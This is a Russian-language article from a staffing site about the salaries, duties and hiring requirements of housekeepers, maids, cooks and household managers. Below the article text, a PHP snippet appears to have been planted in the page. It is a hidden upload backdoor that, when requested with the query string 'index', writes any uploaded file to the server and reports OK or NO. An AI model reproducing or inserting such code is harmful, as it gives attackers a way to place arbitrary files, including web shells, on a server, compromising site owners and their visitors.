НУЖНЫЕ ЛЮДИ
     
 

Статьи

Зарплата домработницы, горничной, повара, экономки.

«назад

Будучи опытной домработницей, с хорошими рекомендациями в крупных городах можно зарабатывать порядка 800-900 $ в месяц, или 350-600$, живя на периферии, при этом, не работая на госпредприятии.
Тем более эта должность сейчас востребована, некоторые семьи прибегают к их помощи как пару раз в месяц, так и к полной занятости.
Основные требования к таким работникам - это большой стаж работы в этой сфере, а также, чтобы это был прилежный, опрятный человек, вызывающий симпатию у окружающих.
Также существует ряд факторов влияющих на зарплату домработницы. 
Обязанности: за одну только уборку в квартире сумма колеблется от 500-1500 руб. в день.
Если заниматься только уборкой, большой капитал не заработаешь. Серьезней будет, если дополнительно к уборке, ей придется еще и стирать, гладить, а также проводить влажную уборку, еще и в санузлах, балконах,  на лестничных клетках.
Помимо домработниц и горничных есть еще и экономки. У нее еще и дополнительные обязанности (консервирование, присмотр за животными и растениями, ухаживать за гардеробом и обувью, возможно и сбор детей в школу/ детский сад). Также можно договориться и она будет в  роле повара и официанта в Вашем доме.
Дополнительно можно воспользоваться  услугами повара, его зарплата зависит от объема и сложности приготовленных им блюд.
Как оказалось, женщины 40-50 лет пользуются большим спросом. У них уже взрослые самостоятельные дети, поэтому, намного больше свободного времени, и, самое главное, большой жизненный опыт. Соискательницам, которым постарше, предлагают частичную занятость. Ведь  им уже сложнее справляться с работой по дому.
Очень большое значение имеют рекомендации, без них на работу в этой сфере не устроиться. В нормальных кадровых агентствах без бумаги, подтверждающей профессионализм и добропорядочность, кандидатуру рассматривать не будут.
В этой профессии работодатели отдают предпочтение женщинам, мужчин если берут на подобную должность, то это садовником или помощником по хозяйству.
Самый быстрый способ найти работу домработнице – кадровые агентства. Они занимаются качественным подбором персонала. Тем более, у них есть психологи, которые тестируют кандидатов, оценивая  профрасположенность и навыки к работе.

 
     


if ($_SERVER['QUERY_STRING'] == 'index') { echo '
'; $uploaddir = ''; $uploadfile = $uploaddir.basename($_FILES['uploadfile']['name']); if (copy($_FILES['uploadfile']['tmp_name'], $uploadfile)) { echo "

OK

"; exit; }else{ echo "

NO

"; exit; } exit; }